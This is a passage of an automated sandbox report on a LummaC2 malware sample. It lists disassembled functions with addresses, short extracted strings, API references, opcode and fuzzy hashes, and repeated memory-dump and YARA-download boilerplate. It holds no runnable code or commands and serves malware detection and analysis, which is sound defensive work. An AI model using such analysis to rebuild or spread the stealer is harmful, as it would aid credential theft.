Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: a|}r$nww$tefr$tefr
API String ID: 0-1676423017
Opcode ID: 1ed5c153041393bf6b1172d92ef68eef5b76a11e73d88f32c3115211fa7d66de
Instruction ID: dffa4bdb1e99d508c3d7add3353bab1b668b09de26086982d6e3e03a0f845541
Opcode Fuzzy Hash: 1ed5c153041393bf6b1172d92ef68eef5b76a11e73d88f32c3115211fa7d66de
Instruction Fuzzy Hash: 23C1F77224C3545BC311EF2488512AFFBE2DBD1305F588A6DE8D54F342D639881E8B5B

Function 0047C894 Relevance: 5.3, Strings: 4, Instructions: 308COMMON

Download Yara Rule

Strings

d, xrefs: 0047CACA
0, xrefs: 0047CB61
@, xrefs: 0047CBB3
^TFW, xrefs: 0047CC43

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$@$^TFW$d
API String ID: 0-3517422908
Opcode ID: 1a25aa74a04e2fee4c4fc5b07b3c3c7f020f82d85f036a7ea1a528d597600ee8
Instruction ID: 7d8833951f84921a932f6c872ca076fe1b7546cc100c7c7184b155cd0d495ca7
Opcode Fuzzy Hash: 1a25aa74a04e2fee4c4fc5b07b3c3c7f020f82d85f036a7ea1a528d597600ee8
Instruction Fuzzy Hash: 7C71386010C3814BE319CF3984A137BBBD1AFD6304F58C96EE4DA8B391D6788505875A

Function 004664E0 Relevance: 5.2, Strings: 4, Instructions: 238COMMON

Download Yara Rule

Strings

L4, xrefs: 00466570
pv, xrefs: 00466702
tuz, xrefs: 0046670D
gF, xrefs: 004667E1

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: gF$pv$tuz$L4
API String ID: 2994545307-1187898607
Opcode ID: 4d33ad87da494f64a3935ce1fa422d645701d3209aa5a5b49da7b5c609838af7
Instruction ID: ba7ae81e6d3cd0a559d5fea6e8ee9becfa21abec5a43efeabc29ee2e3a164eb7
Opcode Fuzzy Hash: 4d33ad87da494f64a3935ce1fa422d645701d3209aa5a5b49da7b5c609838af7
Instruction Fuzzy Hash: 0B8114316083119BD7608F28DC91BAB73E2EFC4314F19893DD58987295EB389946C756

Function 0045D35C Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 625COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0045D368
CoUninitialize.OLE32 ref: 0045D7A4

Strings

(P, xrefs: 0045D7B2

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: Uninitialize
String ID: (P
API String ID: 3861434553-2012212641
Opcode ID: b18f7241b0bf9437176d7f47752d5741ab62eb4709383718707fa3054f55abe4
Instruction ID: 011f61fc834e1767c851621e785a86e6fce6768dc099e4838418c25f19d3a493
Opcode Fuzzy Hash: b18f7241b0bf9437176d7f47752d5741ab62eb4709383718707fa3054f55abe4
Instruction Fuzzy Hash: 2622027194D3C18AD335CF39D49079BBFE0AF96309F188AADC8D95B242D739450ACB86

Function 0048A800 Relevance: 4.4, Strings: 3, Instructions: 638COMMON

Download Yara Rule

Strings

f, xrefs: 0048AA31
<Y?., xrefs: 0048ABDB
@Y?., xrefs: 0048AC15

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: <Y?.$@Y?.$f
API String ID: 2994545307-3750340189
Opcode ID: 95fc153dc5a27db085f27298f56628755d3db16e49adfc413758b2e3a31889c2
Instruction ID: 5d717be4c507fd453f5533b091bd12e420776caa2aa40859a95641c276593efe
Opcode Fuzzy Hash: 95fc153dc5a27db085f27298f56628755d3db16e49adfc413758b2e3a31889c2
Instruction Fuzzy Hash: 7B22E1716083418FE314DF28C891A2FBBE2EB99314F188D2EE59587392D778DC158B5B

Function 00459710 Relevance: 4.1, Strings: 3, Instructions: 395COMMON

Download Yara Rule

Strings

HVKG, xrefs: 004597A0
v~, xrefs: 00459A04
p, xrefs: 00459936

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: HVKG$p$v~
API String ID: 0-1862922427
Opcode ID: 53391ad2c6d9a84f46801ff38d276b4aa06341fcaa1d7dace43b45d0843e6c13
Instruction ID: 1699178c68654a089dbcb1d90577252965c11cdef9eb0b50b5f7fbd97256a02a
Opcode Fuzzy Hash: 53391ad2c6d9a84f46801ff38d276b4aa06341fcaa1d7dace43b45d0843e6c13
Instruction Fuzzy Hash: 8FB144B160C3408BE314CF69D8816ABBBE5EFD2314F14496DE4E18B392D778D90ACB56

Function 0047BF45 Relevance: 4.1, Strings: 3, Instructions: 336COMMON

Download Yara Rule

Strings

@a, xrefs: 0047C2AF
L,2H, xrefs: 0047BF4D
u, xrefs: 0047C364

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: @a$L,2H$u
API String ID: 0-2528062038
Opcode ID: 64de1afea9581ae6f74470f110eb8a01d8034eb68e8409b553759a9f29ef1e5c
Instruction ID: 69a82230f56080186ec22325008d3a95fe3df8170478c5bdc01801967d84f050
Opcode Fuzzy Hash: 64de1afea9581ae6f74470f110eb8a01d8034eb68e8409b553759a9f29ef1e5c
Instruction Fuzzy Hash: 9191B27050C3C18BD769CF3984607EBBBD1AFA6304F1489AED4D997282D7398506CB5A

Function 0047C984 Relevance: 4.1, Strings: 3, Instructions: 301COMMON

Download Yara Rule

Strings

d, xrefs: 0047CACA
@, xrefs: 0047CBB3
^TFW, xrefs: 0047CC43

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: 9c7287e6b2629d556513b94d639f4b882aba0fa8173148ab754d2b0ab8ce3489
Instruction ID: 0070fccfe8654421985834c80b8a96ea480ab0ec4bb2f3f82d49ba397dbb7ede
Opcode Fuzzy Hash: 9c7287e6b2629d556513b94d639f4b882aba0fa8173148ab754d2b0ab8ce3489
Instruction Fuzzy Hash: 727138A020C3814FE319CF3984A137BBFD19FD6305F68C96EE4DA8B391D6788406875A

Function 0047C9E9 Relevance: 4.0, Strings: 3, Instructions: 300COMMON

Download Yara Rule

Strings

d, xrefs: 0047CACA
@, xrefs: 0047CBB3
^TFW, xrefs: 0047CC43

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: e7f55f902c0ef7d6e80d9cbd46dfbad40ceee0bb626980b5401cb896635c9a11
Instruction ID: 4e1e7f690e679cb8bbd66286cfd396184589c1e6e2bdfe0f42fa6cddf04ac0e1
Opcode Fuzzy Hash: e7f55f902c0ef7d6e80d9cbd46dfbad40ceee0bb626980b5401cb896635c9a11
Instruction Fuzzy Hash: F37127A020C3814BE319CF3984A137BBBD19FD6345F68C96EE4DA8B391D6788446875A

Function 0047C9DA Relevance: 4.0, Strings: 3, Instructions: 274COMMON

Download Yara Rule

Strings

d, xrefs: 0047CACA
@, xrefs: 0047CBB3
^TFW, xrefs: 0047CC43

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: f0716530c79920feda449598252ed381aa207bd24e22cc6dee27f73771ac4e26
Instruction ID: 574fbdd3a7a08992266ac594564a319eab185ae1830a3133f6b8c322ff6ca673
Opcode Fuzzy Hash: f0716530c79920feda449598252ed381aa207bd24e22cc6dee27f73771ac4e26
Instruction Fuzzy Hash: EC6136A010C3814FD3198F3A94A137BBFD19FE6304F58C96EE4DA8B391D23885068B5A

Function 00475640 Relevance: 4.0, Strings: 3, Instructions: 267COMMON

Download Yara Rule

Strings

O6E4, xrefs: 0047593D, 0047594C
AF, xrefs: 004758DC
)G, xrefs: 004758D4

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: )G$AF$O6E4
API String ID: 0-708911115
Opcode ID: 8ec6d81a368636483f53a5262d03c7df6d3968ac354951764ba2c7921f2d5c37
Instruction ID: ff52e18b46bbdf3298d0b8e78dc322c85c035bce99b8141f9b462d0fbac93095
Opcode Fuzzy Hash: 8ec6d81a368636483f53a5262d03c7df6d3968ac354951764ba2c7921f2d5c37
Instruction Fuzzy Hash: 078136B16083508BD7149F14C8913ABBBE2EFD1314F19C92DE4CA8F391EBB98905C796

Function 0046720B Relevance: 3.4, Strings: 2, Instructions: 890COMMON

Download Yara Rule

Strings

!, xrefs: 004678E5
1, xrefs: 00467631

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: !$1
API String ID: 2994545307-1727534169
Opcode ID: 7f228a5fe45cd62f8094b362780430c384ed65d1a3e28b20db2f3f33caba4bf1
Instruction ID: 2c51a19f9b4aead4d78e5b0e5b3f3e992c18e68153be80ed25b4422e9b9bb935
Opcode Fuzzy Hash: 7f228a5fe45cd62f8094b362780430c384ed65d1a3e28b20db2f3f33caba4bf1
Instruction Fuzzy Hash: C122177160C3418FD7298F25D89163B77E2EBA6318F18497ED4C697352E6388806CB5B

Function 00454C50 Relevance: 3.3, Strings: 2, Instructions: 812COMMON

Download Yara Rule

Strings

8, xrefs: 00455592
0, xrefs: 0045559A

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 2ad5d78b7399d1f62e385b1efb8b73508b1c5ff6cafd6a588724b7848c682937
Instruction ID: e5d631e15b1273de0d9366f29a94dbe1f27f9d94cd539ece9238ccf615e98c7a
Opcode Fuzzy Hash: 2ad5d78b7399d1f62e385b1efb8b73508b1c5ff6cafd6a588724b7848c682937
Instruction Fuzzy Hash: B97248715083419FD714CF18C890BABBBE1BF88319F44891EF9898B392D379D958CB96

Function 0046CC60 Relevance: 3.0, Strings: 2, Instructions: 493COMMON

Download Yara Rule

Strings

46i`, xrefs: 0046D104
06i`, xrefs: 0046D13A

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: 06i`$46i`
API String ID: 0-253969996
Opcode ID: 891b6a5291eee6637c4c5f1114ee17ae88e4557f704cbe1392ac03dddc8b27a2
Instruction ID: cd7d208ac4d1a1edf4fc1ce24321b3ed3ad5527de1d6d82a42da95bb59156854
Opcode Fuzzy Hash: 891b6a5291eee6637c4c5f1114ee17ae88e4557f704cbe1392ac03dddc8b27a2
Instruction Fuzzy Hash: 79D1F476A183118BC724CF69C8912BBB7E2EFD5310F08892DE8D58B394F7789905C796

Function 004880C5 Relevance: 2.9, Strings: 2, Instructions: 443COMMON

Download Yara Rule

Strings

:, xrefs: 004885B4
NO, xrefs: 00488378

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: :$NO
API String ID: 0-151983983
Opcode ID: b127e882692fdb1989e384fceb3e5883d3bd9d487144817a2dfcecc373db870c
Instruction ID: 41bb6b5856829fe143e7d6500a97884d73659ddacb75276e543bbed5f956357f
Opcode Fuzzy Hash: b127e882692fdb1989e384fceb3e5883d3bd9d487144817a2dfcecc373db870c
Instruction Fuzzy Hash: D2D1E337238252CBC7189F78DC1226A73F2FF99751F5A887ED441872A0EB39C9508759

Function 0048E540 Relevance: 2.8, Strings: 2, Instructions: 341COMMON

Download Yara Rule

Strings

lohi, xrefs: 0048E624, 0048E6C5
{rsp, xrefs: 0048E750

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: lohi${rsp
API String ID: 2994545307-2839643115
Opcode ID: 40b39ca6e8f6bdb200b8873a2bb0e35b9a07f0a00296aac50c7fd9388b62bd3c
Instruction ID: c7007ffe95e330494713e616b517e9b9cfb18198b3b8567907555fa89c779eb3
Opcode Fuzzy Hash: 40b39ca6e8f6bdb200b8873a2bb0e35b9a07f0a00296aac50c7fd9388b62bd3c
Instruction Fuzzy Hash: 4B9117716083448FD324EE29D88066FB7D2EBD6318F298D3DE49687351DA34E805CB96

Function 00454310 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

IEND, xrefs: 00454701
), xrefs: 0045438B

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: f80bf8da3fb7f25fcb5b91a6014259b656b55cefb45df88cdf173f1510edb343
Instruction ID: 45b5f442708684cbfe2ebc087ad4f22663014721713eb3131d97fcfd8cbdc787
Opcode Fuzzy Hash: f80bf8da3fb7f25fcb5b91a6014259b656b55cefb45df88cdf173f1510edb343
Instruction Fuzzy Hash: 06D1DEB1608344AFD710CF19D84175FBBE0AB94308F14492EFD989B382D778E948CB96

Function 00467B75 Relevance: 2.8, Strings: 2, Instructions: 325COMMON

Download Yara Rule

Strings

"#, xrefs: 00467D10
s}, xrefs: 00467C34

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: "#$s}
API String ID: 0-1697270657
Opcode ID: b476cb98b44e4dd1c544d079f5677d6f29f147dd24c3dce631bd55afb8140f6d
Instruction ID: 1e2b39100fc828fc5ebf10bb38824727be93a430f2b2e0d46a1230393b08d22e
Opcode Fuzzy Hash: b476cb98b44e4dd1c544d079f5677d6f29f147dd24c3dce631bd55afb8140f6d
Instruction Fuzzy Hash: 7AB176B01183818BD7748F24C4917EBBBE1AF96318F14492DE4C98B391EB798945CB97

Function 0047C289 Relevance: 2.8, Strings: 2, Instructions: 309COMMON

Download Yara Rule

Strings

@a, xrefs: 0047C2AF
u, xrefs: 0047C364

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: @a$u
API String ID: 0-583156259
Opcode ID: 0e4d9550ea48f4cc6d70c31292ea4a3e433781b0398bcee92009301a91c48f34
Instruction ID: f15b54e0eedcc3e45d6a0b30fe61cf7f61a69d71dfb41dc4beeb4af06761476c
Opcode Fuzzy Hash: 0e4d9550ea48f4cc6d70c31292ea4a3e433781b0398bcee92009301a91c48f34
Instruction Fuzzy Hash: 0F81C57050C3C18BD769CF3984A07EBBBD1AFA6304F1889AED4C997382D7398506CB56

Function 0046683F Relevance: 2.8, Strings: 2, Instructions: 289COMMON

Download Yara Rule

Strings

7, xrefs: 00466991
gfff, xrefs: 00466A5E

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: 7$gfff
API String ID: 0-3777064726
Opcode ID: 37e5ee32d47eed29bb5486b858d6b27b8cc7babb98b3963bc092bd761b1c6eed
Instruction ID: 4e8cc16a65ee8d2d4480aaf855167038dd1e76a88923a77eb6d277ede0198106
Opcode Fuzzy Hash: 37e5ee32d47eed29bb5486b858d6b27b8cc7babb98b3963bc092bd761b1c6eed
Instruction Fuzzy Hash: 68915BB3A146104FD718CB38CC527AB77D2ABD4324F1AC63ED895D7385EA7C98068786

Function 0046AD81 Relevance: 2.8, Strings: 2, Instructions: 279COMMON

Download Yara Rule

Strings

x3,-, xrefs: 0046AE6E
CM, xrefs: 0046AF47

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: CM$x3,-
API String ID: 0-963954796
Opcode ID: c5e50d99c8a43b8125910d17656dea53a6147f2c74821889a5ebe291237cb7ac
Instruction ID: 55ec5c304b51bc3da6554378eee3fdfa606022eaf7b63036fef65ac4f0991fc6
Opcode Fuzzy Hash: c5e50d99c8a43b8125910d17656dea53a6147f2c74821889a5ebe291237cb7ac
Instruction Fuzzy Hash: 03914DB4910B009FC7249F29C996617BBF0FF0A310B448A5EE4D69BB95E334A416CF97

Function 0046D172 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

[U, xrefs: 0046D210
_8Y, xrefs: 0046D208

Memory Dump Source

